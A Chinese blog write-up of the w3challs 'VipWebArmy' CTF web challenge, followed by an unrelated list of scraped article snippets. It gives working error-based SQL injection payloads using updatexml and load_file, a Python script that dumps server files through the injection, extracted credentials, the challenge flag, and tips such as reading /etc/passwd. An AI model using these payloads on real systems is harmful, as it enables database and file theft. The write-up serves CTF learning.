河鱼不高兴
河鱼不高兴

w3challs web-VipWebArmy

w3challs web-VipWebArmy

入手点:
通过注入尝试,发现注入点在contact页面,尝试输入',会发现有报错信息输出:

Error while executing the SQL query.

并且可以看出,这里对于'前面是加了\进行转义,因此考虑在不使用'的情况下构造查询语句,通过报错信息爆破出数据库名:

recipient=1 or updatexml(1,concat(0x7e,database()),0)&msg=2

这里使用updatexml报错注入,之前的文章里也有简单学习过该函数,关键是第二个参数,该参数必须为Xpath_String类型,这里我们将第二个参数构造为以~开头的字符串,必然不符合xml格式语法,于是括号内的执行结果会以报错的形式输出,实现报错注入。

Error while executing the SQL query.

可以看到成功将数据库名VipWebArmy输出。
爆表名:

recipient=1 or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),0)&msg=2

输出:

Error while executing the SQL query.

爆列名:

recipient=1 or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() limit 1)),0)&msg=2

输出:

Error while executing the SQL query.

爆密码:

recipient=1 or updatexml(1,concat(0x7e,(select group_concat(login,password) from members limit 0,1)),0)&msg=2

Error while executing the SQL query.

得到用户名为LuG[3]R,密码为4188679c1d8a284ccc41a6b6(此处为不完整的md5值,为啥只探测出24位也懒得纠结了,直接网上搜可得到原文kiss)。成功登录。
登录发现题目还有第二阶段,还要在进行一次认证。这种认证方式让人联想到之前做过的htaccess那道题,直接在当前目录下访问一下看是否存在这个文件:

http://vip.hax.w3challs.com/.htaccess

没想到提示的是don't have permission

Forbidden
You don't have permission to access this resource.

路径还真猜对了…接下来的做法很大一部分是靠之前做题的经验+猜测orz 因为之前htaccess一题中,绝对路径为/home/项目名/www/,所以结合题目url也大胆猜测一下被隐藏的viparea页面的php文件路径为/home/vipwebarmy/www/VipWebArmy.php
猜测路径之后,还是借助前面的updatexml注入,爆出源码文件内容,这里要用到load_file这个函数,需要注意的是,在注入时'是被过滤掉的,所以要将文件路径转为十六进制传入。

recipient=1 or updatexml(1,concat(0x7e,substring((select load_file(0x2f686f6d652f76697077656261726d792f7777772f56697057656241726d792e706870)),1,30)),0)&msg=2

发现返回了报错信息:

Error while executing the SQL query.

说明有戏,直接写脚本爆出完整php代码:

import requests
import re

url = 'http://vip.hax.w3challs.com/index.php?page=contact'
cookie = {
	'PHPSESSID':'xxxxxxxxxx'
}
final_text = ''
for i in range(0,100):
	recipient = '1 or updatexml(1,concat(0x7e,substring((select load_file(0x2f686f6d652f76697077656261726d792f7777772f56697057656241726d792e706870)),%s,30)),0)' % str(1+i*30)
	#recipient='1 or updatexml(1,concat(0x7e,substring((select load_file(0x2f686f6d652f76697077656261726d792f7777772f56697057656241726d792e706870)),1,30)),0)'
	#print(recipient)

	data = {'recipient':recipient, 'msg':'2'}
	res = requests.post(url = url, cookies = cookie, data = data)
	#print(res.text)

	code = re.compile(r"(?<=XPATH syntax error: '~).*?(?=' -->)", re.DOTALL)
	text = code.findall(res.text)

	print(text[0],end="")
	final_text += text[0]

print(final_text)

爆出VipWebArmy.php文件源码:


/********************************************************************************************\
|            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                    |
| A comment that seems useless but that is useful nonetheless. Understand if you can :D      |
| Do not remove!                                                                             |
|            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                    |
\*******************************************************************************************/
session_start();

require_once('lang.php');
require_once('../db/vip.php');

if(!isset($_SESSION['admin']) || $_SESSION['admin']!==True)
        echo fail_auth1;
else
        echo password_is.password('azerfazefazdamlfkazoezaefralmzefalz').'.';
?>

其实爆出来感觉也没什么卵用…因为之前都已经猜出来.htaccess路径和VipWebArmy.php在同一目录下,/home/vipwebarmy/www/.htaccess,将其转换为十六进制替换之前脚本中的参数,重新运行,可以获取.htaccess的内容:


AuthType Basic
AuthName "VipWebArmy - Protected Area"
AuthUserFile "/home/vipwebarmy/www/pass/pass.txt"
require valid-user

好的获取到了pass.txt的路径,直接访问肯定是不可能,依然用load_file爆出:

army:xedh6CDiqPkbA

还以为密码就是这个…这鬼题目还是要用John The Ripper爆破计算一下,结果为soldier

Well done, the flag is: W3C{MenuM4xiB3st0f}.

附:
做完题之后再去论坛看看别人的解题过程,发现还是有很多知识盲区。用load_file爆出文件内容是由许多限制的,如:

  1. 需要知道文件的绝对物理路径
  2. magic_quotes_gpc=off(该开关代表是否对'等特殊符号转义,一般都会开的,但是可以通过char()函数或将字符串转为十六进制绕过)
  3. mysql用户拥有file_priv权限(不然无法读或是写文件)

在该题中,这几个条件正好可以满足(实际情况中要复杂的多)。
并且对于本题,admin也给出了爆出绝对路径的两种方法:

  1. load_file('/etc/passwd'):然而在此题不可用,因为加了secure_file_priv保护,项目之外的文件不可读取。
  2. 爆出secure_file_priv的值,该值中就包含有绝对路径(不得不说这种方法我完全没有意识到…)。
recipient=1 or updatexml(1,concat(0x7e,substring((select @@secure_file_priv),1,30)),0)&msg=2

报错回显绝对路径:

Error while executing the SQL query.

你可能感兴趣的:(web,ctf)

  • C#实现的中软WebServer架构范例解析 艾古力斯
    本文还有配套的精品资源,点击获取简介:本示例详细探讨了如何使用C#语言和.NET框架构建一个基于Northwind数据库的Web服务器应用程序。演示了C#在编写服务器端代码、处理HTTP请求和数据库交互中的应用,并提供了关于ASP.NET框架、路由规则和MVC设计模式的深入理解。此外,通过分析源码,开发者可以学习到代码组织、错误处理和性能优化的实践方法。1.C#语言和.NET框架在Web服务中的应
  • 【网络安全】零基础小白如何入门CTF 程序员橘子 web安全安全网络渗透测试网络安全
    新手小白应该怎么入门CTF?要如何学习CTF?分几阶段学习?想打CTF,但是没有思路怎么办?这是我花了两天,整理的CTF学习的思路与方法,方便大家学习时可以参考。如果觉得有帮助的小伙伴,记得点赞收藏关注!一、CTF简介01」简介中文一般译作夺旗赛(对大部分新手也可以叫签到赛),在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代
  • 20250110面试鸭特训营第18天 Again_acme 面试鸭特训营面试职场和发展
    更多特训营笔记详见个人主页【面试鸭特训营】专栏2501101.常见的HTTP状态码有哪些?状态码由三位数组组成,且第一位数字表示类别常见的HTTP状态码分为五大类1xx:信息响应状态码标识含义100Continue服务器已接收请求的初步部分,客户端应继续请求101SwitchingProtocols服务器同意协议,如从HTTP切换到WebSocket2xx:成功状态码标识含义200OK请求成功,服
  • 【ubuntu】【rabbitmq】ubuntu 安装 rabbitmq wecode66 rabbitmq分布式
    文章目录一、安装erlang二、添加公钥三、更新软件包(可选)四、安装RabbitMQ五、RabbitMQ状态管理六、安装web插件七、远程登录(web端)八、添加自定义VHOST及分配权限一、安装erlang#安装erlangsudoapt-getinstallerlang-nox#查看relang语言版本,成功执行则说明relang安装成功erl二、添加公钥wget-O-https://www
  • F#语言的Web开发 轩辕烨瑾 包罗万象golang开发语言后端
    F#语言的Web开发F#语言是一种多范式编程语言,基于.NET平台,强调函数式编程,同时也支持面向对象和命令式编程。近年来,随着web应用开发需求的不断增加,F#逐渐受到开发者的关注。本文将深入探讨F#语言在Web开发中的应用,包括语言特点、Web框架的选择、开发流程以及与其他语言和技术的比较等内容。一、F#语言的特点1.1函数式编程F#作为一门函数式编程语言,其核心在于如何用函数来描述计算。在F
  • 后端开发基础——JavaWeb(根基,了解原理)浓缩 Wanna715 后端开发基础javatomcatservlet后端
    总述学习Tomcat、JSON、Servlet、Filter、Session、Cookie、Ajax异步请求、RESTful接口规范、JSP(很老的技术,了解)Servlet系统架构C/S架构(Client/Server(客户端/服务器))B/S架构(Browser/Server,浏览器/服务器)javaJavaSE:Java标准版JavaEE:企业版(WEB方向,WEB系统)13种规范,其中Se
  • 【Web前端】JWT(JSON Web Tokens)概述 泡芙冰淇淋ya Web前端json
    1、简介JWT(JSONWebTokens)是一种用于双方之间安全传输信息的简洁的、URL安全的令牌标准。它基于JSON对象,并通过数字签名确保其完整性和真实性。JWT因其小巧、自包含以及易于在客户端和服务器之间传输的特性而被广泛使用于身份验证和信息交换的场景中。2、组成部分JWT由三个部分组成,这三部分通过点(.)分隔:Header(头部):头部通常包含了两部分信息:例如:typ:表示令牌的类型
  • Gin 框架中间件原理 黑色叉腰丶大魔王 gin中间件
    一、引言在现代Web应用开发中,中间件扮演着至关重要的角色。Gin作为一个流行的Go语言Web框架,其强大的中间件功能使得开发者能够高效地处理各种通用任务,如日志记录、身份验证、错误处理等。理解Gin框架中间件的原理,不仅有助于我们更好地使用Gin进行开发,还能让我们根据实际需求定制出灵活且高效的中间件。二、Gin框架概述Gin是一个用Go语言编写的轻量级Web框架,它以其高性能、简单易用而受到广
  • 登录授权方案:JSON Web Tokens (JWT) Java牛马 javaJWT登录授权授权校验
    登录授权方案:JSONWebTokens(JWT)JWT官方文档:https://jwt.io/introduction1.简介:JWT即jsonwebtokens,通过JSON形式作为Web应用中的令牌,用于在各方之间安全地将信息作为JSON对象传输,在数据传输过程中还可以完成数据加密、签名等相关处理。可用于登录授权或者其他服务之前的信息交换;JWT本质就是一个字符串,它是一个开放标准(rfc7
  • php jwt解密token,php实现JWT(json web token)鉴权实例 数据科学人工智能 phpjwt解密token
    JWT是什么JWT是jsonwebtoken缩写。它将用户信息加密到token里,服务器不保存任何用户信息。服务器通过使用保存的密钥验证token的正确性,只要正确即通过验证。基于token的身份验证可以替代传统的cookie+session身份验证方法。JWT由三个部分组成:header.payload.signature以下示例以JWT官网为例header部分:{"alg":"HS256","
  • Yii框架中的表单构建器:构建复杂表单 ac-er8888 服务器运维php开发语言
    Yii框架中的表单构建器(FormBuilder)是一个强大的工具,它允许开发人员以简单、面向对象的方式构建复杂的表单,从而提升Web应用的用户体验。以下是对Yii框架中表单构建器的详细简述,特别是在构建复杂表单方面的应用:一、表单构建器的基础组件介绍:Yii表单构建器是Yii框架中的一个组件,专门用于创建Web表单。它提供了一个简单的、面向对象的编程接口,使得开发人员能够轻松地创建各种常见的表单
  • tomcat配置存放静态资源,实现网页访问并下载 qq_40711092 tomcatjava
    配置server.xml在server.xml文件中的Host标签下嵌入一个Context标签,path是映射的web路径,doBase是本地磁盘的物理路径。-->-->设置tomcat允许访问静态文件夹,修改web.xml文件中如下图位置将false修改为truedefaultorg.apache.catalina.servlets.DefaultServletdebug0listingstru
  • Spring 3自定义注解与格式化器的深度实践 t0_54manong springpython数据库个人开发
    在Spring框架中,格式化器(Formatter)和注解(Annotation)是处理数据格式化和验证的强大工具。通过将注解与格式化器绑定,我们可以在字段级别灵活地定义数据的格式化规则。本文将通过一个完整的示例,展示如何创建自定义注解、格式化器,并将它们绑定到Spring的AnnotationFormatterFactory中,实现字段级别的数据格式化。一、背景与需求在开发Web应用时,我们经常
  • uniapp APP端页面触发调用uniapp开发的webview里的方法 printf_824 uniapp分享uni-app
    原理:使用getCurrentInstance()获取当前组件的Vue实例,通过instance.proxy.$scope.$getAppWebview()获取Uniapp的原生WebView对象。使用WebView提供的evalJS方法,执行嵌入H5页面内的JavaScript代码functiongetData(){url.value="http://192.168.0.22:5174/#/pa
  • Blazor-Blogs 开源项目教程 陆滔柏Precious
    Blazor-Blogs开源项目教程Blazor-BlogsSimplebloggingapplicationwritteninMicrosoftServerSideBlazor项目地址:https://gitcode.com/gh_mirrors/bl/Blazor-Blogs项目介绍Blazor-Blogs是一个基于Blazor框架的开源博客系统。Blazor是一个使用.NET构建客户端Web
  • Blazor-AdminLTE 项目教程 诸余煦
    Blazor-AdminLTE项目教程blazor-adminlteThisprojectadaptsADMINLTE3sothecomponentscanbeusedfromdotnetcoreBlazor/Server/WebAssembly项目地址:https://gitcode.com/gh_mirrors/bl/blazor-adminlte1.项目的目录结构及介绍Blazor-Admi
  • dotnet-blazor-crud 项目教程 尚舰舸Elsie
    dotnet-blazor-crud项目教程dotnet-blazor-crudDemoapplicationbuiltwiththeBlazorclient-sidehostingmodel(WebAssembly)and.NETCoreRESTAPIssecuredbyaJWTservice.项目地址:https://gitcode.com/gh_mirrors/do/dotnet-blazo
  • AWS Elastic Beanstalk HaoHao_010 awsjava云计算服务器云服务器
    AWSElasticBeanstalk是一项由AmazonWebServices(AWS)提供的完全托管的服务,旨在简化和加速应用程序的部署、管理和扩展。通过ElasticBeanstalk,开发者可以轻松地将应用程序发布到AWS云平台,而无需关注底层的基础设施管理,如服务器、负载均衡、扩展等。ElasticBeanstalk为开发人员提供了一个简化的方式来运行Web应用程序和服务,并自动处理许多
  • Lua语言的Web开发 梁雨珈 包罗万象golang开发语言后端
    Lua语言的Web开发引言随着互联网的快速发展,Web开发技术也在不断演进。许多开发者都在寻找一种轻量级且高效的编程语言来进行Web开发。Lua语言作为一种简洁、高效的脚本语言,近年来逐渐为开发者所关注。在本篇文章中,我们将深入探讨Lua语言在Web开发中的应用,分析其优缺点,并介绍一些常用的框架和库。Lua语言概述Lua是一种轻量级的、高级的、多范式的编程语言,设计初衷是为了嵌入其他应用程序中。
  • Perl语言的软件开发工具 Code侠客行 包罗万象golang开发语言后端
    Perl语言的软件开发工具引言Perl是一种功能强大且灵活的高级编程语言,自1987年由拉里·沃尔(LarryWall)创建以来,就广泛应用于文本处理、系统管理、网络编程、Web开发等多个领域。作为一种脚本语言,Perl以其简洁的语法和强大的正则表达式处理能力而受到开发者的青睐。在实际开发过程中,虽然没有像Java或Python那样广泛流行,但Perl也有着自己独特的生态系统,其中包括许多强大的开
  • 小白WEB前端学习(七) Sun ᥫᩣ涵 WEB前端前端学习
    续:小白WEB前端学习(六)继续学习CSS(五)8.响应式布局:响应式布局意在实现不同屏幕分辨率的终端上浏览网页的不同展示方式1.响应式布局介绍:优点:面对不同分辨率设备灵活性强能够快捷解决多设备显示适应问题缺点:兼容各种设备工作量大,效率低下代码累赘,会出现隐藏无用的元素,加载时间加长手机:76899212482.media媒体查询HTML标签字号手机屏幕大小不同,分辨率不同如何设置不同的htm
  • 阿里云服务器国际站:阿里云服务器的架构 聚好云 阿里云服务器代理商阿里云服务器阿里云服务器国际站阿里云服务器架构
    阿里云服务器的架构目录阿里云服务器的架构阿里云服务器的主要原理阿里云服务器国际站:阿里云服务器的架构计算架构:X86计算架构:这是最常见的架构,其CPU采用Intel处理器,企业级x86每一个vCPU都对应一个IntelXeon处理器核心的超线程。涵盖了计算型c7、通用型g7、内存型r7等多种实例规格,适用于绝大多数的使用场景,如Web网站应用、企业级应用、内存型或者关系型数据库类应用、高网络收发
  • SpringBoot之定义接口返回类型有几种方式? java熬夜党 Javaspringbootjavamybatis
    SpringBoot系列教程之定义接口返回类型的几种方式实现一个web接口返回json数据,基本上是每一个javaer非常熟悉的事情了;那么问题来了,如果我有一个接口,除了希望返回json格式的数据之外,若也希望可以返回xml格式数据可行么?答案当然是可行的,接下来我们将介绍一下,一个接口的返回数据类型,可以怎么处理I.项目搭建本文创建的实例工程采用SpringBoot2.2.1.RELEASE+
  • 【学习总结|DAY033】后端Web进阶(AOP) 123yhy传奇 javamybatis学习springbootspring
    在当今的软件开发领域,提高代码的可维护性、可扩展性以及减少重复代码是至关重要的。SpringAOP(AspectOrientedProgramming,面向切面编程)作为一种强大的编程思想和技术,在解决这些问题上发挥着重要作用。本文将结合实际代码示例,深入探讨SpringAOP的相关知识,帮助大家更好地掌握这一技术。一、AOP基础概念1.1什么是AOPAOP即面向切面编程,它可以简单理解为面向特定
  • 2025毕设springboot 基于web的电商后台管理系统的设计与实现论文+源码 zhihao503 课程设计springboot前端
    本系统(程序+源码)带文档lw万字以上文末可获取一份本项目的java源码和数据库参考。系统程序文件列表开题报告内容研究背景随着互联网技术的飞速发展和普及,电子商务已成为现代商业的重要组成部分。电商平台作为连接消费者与商家的桥梁,其后台管理系统的设计与实现直接关系到平台的运营效率和用户体验。当前,电商行业竞争激烈,用户对平台的稳定性、响应速度以及商品信息的准确性和丰富性有着越来越高的要求。因此,设计
  • Flask、Tornado 本咸鱼也有梦想啦 Web后端
    文章目录flaskflask响应flask请求蓝图TornadoTornado环境搭建Tornado中的响应方式Tornado中的请求的操作用Tornado实现WebSocket服务器的搭建flask相比django更轻量级支持wsgi协议flask响应1、直接return一个字符串(可以是HTML代码)2、跳转到一个模板页面render_template3、重定向到一个路由中redirectfl
  • Azure 基础 SmallFatMan #Azureazuremicrosoft运维linux服务器学习面试
    Azure基础一、Azure基础知识简介二、云计算简介?三、责任共担四、你始终负责:五、云服务提供商始终负责:六、云模型1、私有云2、公有云3、混合云4、多云一、Azure基础知识简介MicrosoftAzure是一个云计算平台,提供一系列不断扩展的服务,可帮助你构建解决方案来满足业务目标。Azure服务支持从简单到复杂的一切内容。Azure具有简单的Web服务,用于在云中托管业务。Azure还支
  • django开发-django和tornado的不同 weixin_33693070 数据库网络javascriptViewUI
    python中常用的几个web框架有django,tornado,flask等,今天来总结一下django和tornado的不同。工作中django和tornado都用过,使用django相对更多一些。个人感觉django虽然好用,有搭建项目快、自带ORM、自动生成路由、自带管理后台等优势;但若实际工作中选择,我还是会偏向于使用tornado框架,因为torndo使用更加灵活,并且支持websoc
  • python twisted和flask_浅谈Python Web 框架:Django, Twisted, Tornado, Flask, Cyclone 和 Pyramid... 冯妥坨 pythontwisted和flask
    Django是一个高级的PythonWeb框架,支持快速开发,简洁、实用的设计。如果你正在建一个和电子商务网站相似的应用,那你应该选择用Django框架。它能使你快速完成工作,也不必担心太多的技术选择。它能提供从模版引擎到ORM所需的一切东西。用Django构建你的app的时候,你必须要遵循Django的方式,这点像极了RubyonRails的Rails框架。有些人会觉得这样有点不爽,但在我看来这
  • 介绍两个Python web框架:Django & Tornado weixin_30879169 python数据库前端ViewUI
    在各种语言平台中,python涌现的web框架恐怕是最多的;猜想原因应该是在py中构造框架十分简单,使得轮子不断被发明。这里记述一下我了解过的两个pyweb框架,供大家参考,希望能起他山之石的作用。======Django======Django应该是最出名的py框架,GoogleAppEngine甚至Erlang都有框架受它影响。Django是走大而全的方向,它最出名的是其全自动化的管理后台:只
  • java观察者模式 3213213333332132 java设计模式游戏观察者模式
    观察者模式——顾名思义,就是一个对象观察另一个对象,当被观察的对象发生变化时,观察者也会跟着变化。 在日常中,我们配java环境变量时,设置一个JAVAHOME变量,这就是被观察者,使用了JAVAHOME变量的对象都是观察者,一旦JAVAHOME的路径改动,其他的也会跟着改动。 这样的例子很多,我想用小时候玩的老鹰捉小鸡游戏来简单的描绘观察者模式。 老鹰会变成观察者,母鸡和小鸡是
  • TFS RESTful API 模拟上传测试 ronin47
           TFS RESTful API 模拟上传测试。    细节参看这里:https://github.com/alibaba/nginx-tfs/blob/master/TFS_RESTful_API.markdown 模拟POST上传一个图片: curl --data-binary @/opt/tfs.png http
  • PHP常用设计模式单例, 工厂, 观察者, 责任链, 装饰, 策略,适配,桥接模式 dcj3sjt126com 设计模式PHP
    // 多态, 在JAVA中是这样用的, 其实在PHP当中可以自然消除, 因为参数是动态的, 你传什么过来都可以, 不限制类型, 直接调用类的方法 abstract class Tiger { public abstract function climb(); } class XTiger extends Tiger { public function climb()
  • hibernate 171815164 Hibernate
    main,save Configuration conf =new Configuration().configure(); SessionFactory sf=conf.buildSessionFactory(); Session sess=sf.openSession(); Transaction tx=sess.beginTransaction(); News a=new
  • Ant实例分析 g21121 ant
            下面是一个Ant构建文件的实例,通过这个实例我们可以很清楚的理顺构建一个项目的顺序及依赖关系,从而编写出更加合理的构建文件。           下面是build.xml的代码: <?xml version="1
  • [简单]工作记录_接口返回405原因 53873039oycg 工作
             最近调接口时候一直报错,错误信息是:       responseCode:405 responseMsg:Method Not Allowed        接口请求方式Post.
  • 关于java.lang.ClassNotFoundException 和 java.lang.NoClassDefFoundError 的区别 程序员是怎么炼成的
       真正完成类的加载工作是通过调用 defineClass来实现的;  而启动类的加载过程是通过调用 loadClass来实现的;  就是类加载器分为加载和定义   protected Class<?> findClass(String name) throws ClassNotFoundExcept
  • JDBC学习笔记-JDBC详细的操作流程 aijuans jdbc
    所有的JDBC应用程序都具有下面的基本流程:  1、加载数据库驱动并建立到数据库的连接。  2、执行SQL语句。  3、处理结果。  4、从数据库断开连接释放资源。 下面我们就来仔细看一看每一个步骤: 其实按照上面所说每个阶段都可得单独拿出来写成一个独立的类方法文件。共别的应用来调用。 1、加载数据库驱动并建立到数据库的连接:   Html代码  St
  • rome创建rss antonyup_2006 tomcatcmsxmlstrutsOpera
    引用 1.RSS标准 RSS标准比较混乱,主要有以下3个系列 RSS 0.9x / 2.0 : RSS技术诞生于1999年的网景公司(Netscape),其发布了一个0.9版本的规范。2001年,RSS技术标准的发展工作被Userland Software公司的戴夫 温那(Dave Winer)所接手。陆续发布了0.9x的系列版本。当W3C小组发布RSS 1.0后,Dave W
  • html表格和表单基础 百合不是茶 html表格表单meta锚点
    第一次用html来写东西,感觉压力山大,每次看见别人发的都是比较牛逼的 再看看自己什么都还不会,   html是一种标记语言,其实很简单都是固定的格式   _----------------------------------------表格和表单 表格是html的重要组成部分,表格用在body里面的 主要用法如下; <table> &
  • ibatis如何传入完整的sql语句 bijian1013 javasqlibatis
            ibatis如何传入完整的sql语句?进一步说,String str ="select * from test_table",我想把str传入ibatis中执行,是传递整条sql语句。         解决办法: <
  • 精通Oracle10编程SQL(14)开发动态SQL bijian1013 oracle数据库plsql
    /* *开发动态SQL */ --使用EXECUTE IMMEDIATE处理DDL操作 CREATE OR REPLACE PROCEDURE drop_table(table_name varchar2) is sql_statement varchar2(100); begin sql_statement:='DROP TABLE '||table_name;
  • 【Linux命令】Linux工作中常用命令 bit1129 linux命令
    不断的总结工作中常用的Linux命令   1.查看端口被哪个进程占用   通过这个命令可以得到占用8085端口的进程号,然后通过ps -ef|grep 进程号得到进程的详细信息   netstat -anp | grep 8085   察看进程ID对应的进程占用的端口号   netstat -anp | grep 进程ID &
  • 优秀网站和文档收集 白糖_ 网站
    集成 Flex, Spring, Hibernate 构建应用程序   性能测试工具-JMeter   Hmtl5-IOCN网站   Oracle精简版教程网站   鸟哥的linux私房菜   Jetty中文文档   50个jquery必备代码片段   swfobject.js检测flash版本号工具
  • angular.extend boyitech AngularJSangular.extendAngularJS API
    angular.extend 复制src对象中的属性去dst对象中. 支持多个src对象. 如果你不想改变一个对象,你可以把dst设为空对象{}: var object = angular.extend({}, object1, object2). 注意: angular.extend不支持递归复制. 使用方法: angular.extend(dst, src); 参数:
  • java-谷歌面试题-设计方便提取中数的数据结构 bylijinnan java
    网上找了一下这道题的解答,但都是提供思路,没有提供具体实现。其中使用大小堆这个思路看似简单,但实现起来要考虑很多。 以下分别用排序数组和大小堆来实现。 使用大小堆: import java.util.Arrays; public class MedianInHeap { /** * 题目:设计方便提取中数的数据结构 * 设计一个数据结构,其中包含两个函数,1.插
  • ajaxFileUpload 针对 ie jquery 1.7+不能使用问题修复版本 Chen.H ajaxFileUploadie6ie7ie8ie9
    jQuery.extend({ handleError: function( s, xhr, status, e ) { // If a local callback was specified, fire it if ( s.error ) { s.error.call( s.context || s, xhr, status, e ); }
  • [机器人制造原则]机器人的电池和存储器必须可以替换 comsci 制造
           机器人的身体随时随地可能被外来力量所破坏,但是如果机器人的存储器和电池可以更换,那么这个机器人的思维和记忆力就可以保存下来,即使身体受到伤害,在把存储器取下来安装到一个新的身体上之后,原有的性格和能力都可以继续维持.....        另外,如果一
  • Oracle Multitable INSERT 的用法 daizj oracle
    转载Oracle笔记-Multitable INSERT 的用法 http://blog.chinaunix.net/uid-8504518-id-3310531.html 一、Insert基础用法 语法:     Insert Into 表名 (字段1,字段2,字段3...)     Values (值1,
  • 专访黑客历史学家George Dyson datamachine on
    20世纪最具威力的两项发明——核弹和计算机出自同一时代、同一群年青人。可是,与大名鼎鼎的曼哈顿计划(第二次世界大战中美国原子弹研究计划)相 比,计算机的起源显得默默无闻。出身计算机世家的历史学家George Dyson在其新书《图灵大教堂》(Turing’s Cathedral)中讲述了阿兰·图灵、约翰·冯·诺依曼等一帮子天才小子创造计算机及预见计算机未来
  • 小学6年级英语单词背诵第一课 dcj3sjt126com englishword
    always 总是 rice 水稻,米饭 before 在...之前 live 生活,居住   usual 通常的 early 早的 begin 开始 month 月份   year 年 last 最后的 east 东方的 high 高的   far 远的 window 窗户 world 世界 than 比...更  
  • 在线IT教育和在线IT高端教育 dcj3sjt126com 教育
    codecademy  http://www.codecademy.com codeschool  https://www.codeschool.com teamtreehouse  http://teamtreehouse.com lynda http://www.lynda.com/ Coursera https://www.coursera.
  • Struts2 xml校验框架所定义的校验文件 蕃薯耀 Struts2 xml校验Struts2 xml校验框架Struts2校验
      >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年7月11日 15:54:59 星期六 http://fa
  • mac下安装rar和unrar命令 hanqunfeng mac
    1.下载:http://www.rarlab.com/download.htm 选择 RAR 5.21 for Mac OS X 2.解压下载后的文件 tar -zxvf rarosx-5.2.1.tar 3.cd rar sudo install -c -o $USER unrar /bin #输入当前用户登录密码 sudo install -c -o $USER rar
  • 三种将list转换为map的方法 jackyrong list
      在本文中,介绍三种将list转换为map的方法: 1) 传统方法 假设有某个类如下    class Movie { private Integer rank; private String description; public Movie(Integer rank, String des
  • 年轻程序员需要学习的5大经验 lampcy 工作PHP程序员
    在过去的7年半时间里,我带过的软件实习生超过一打,也看到过数以百计的学生和毕业生的档案。我发现很多事情他们都需要学习。或许你会说,我说的不就是某种特定的技术、算法、数学,或者其他特定形式的知识吗?没错,这的确是需要学习的,但却并不是最重要的事情。他们需要学习的最重要的东西是“自我规范”。这些规范就是:尽可能地写出最简洁的代码;如果代码后期会因为改动而变得凌乱不堪就得重构;尽量删除没用的代码,并添加
  • 评“女孩遭野蛮引产致终身不育 60万赔偿款1分未得”医腐深入骨髓 nannan408
    先来看南方网的一则报道: 再正常不过的结婚、生子,对于29岁的郑畅来说,却是一个永远也无法实现的梦想。从2010年到2015年,从24岁到29岁,一张张新旧不一的诊断书记录了她病情的同时,也清晰地记下了她人生的悲哀。   粗暴手术让人发寒   2010年7月,在酒店做服务员的郑畅发现自己怀孕了,可男朋友却联系不上。在没有和家人商量的情况下,她决定堕胎。   12月5日,
  • 使用jQuery为input输入框绑定回车键事件 VS 为a标签绑定click事件 Everyday都不同 jspinput回车键绑定clickenter
    假设如题所示的事件为同一个,必须先把该js函数抽离出来,该函数定义了监听的处理:   function search() { //监听函数略...... }   为input框绑定回车事件,当用户在文本框中输入搜索关键字时,按回车键,即可触发search():   //回车绑定 $(".search").keydown(fun
  • EXT学习记录 tntxia ext
      1. 准备   (1) 官网:http://www.sencha.com/   里面有源代码和API文档下载。   EXT的域名已经从www.extjs.com改成了www.sencha.com ,但extjs这个域名会自动转到sencha上。   (2)帮助文档:   想要查看EXT的官方文档的话,可以去这里h
  • mybatis3的mapper文件报Referenced file contains errors xingguangsixian mybatis
    最近使用mybatis.3.1.0时无意中碰到一个问题: The errors below were detected when validating the file "mybatis-3-mapper.dtd" via the file "account-mapper.xml". In most cases these errors can be d
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他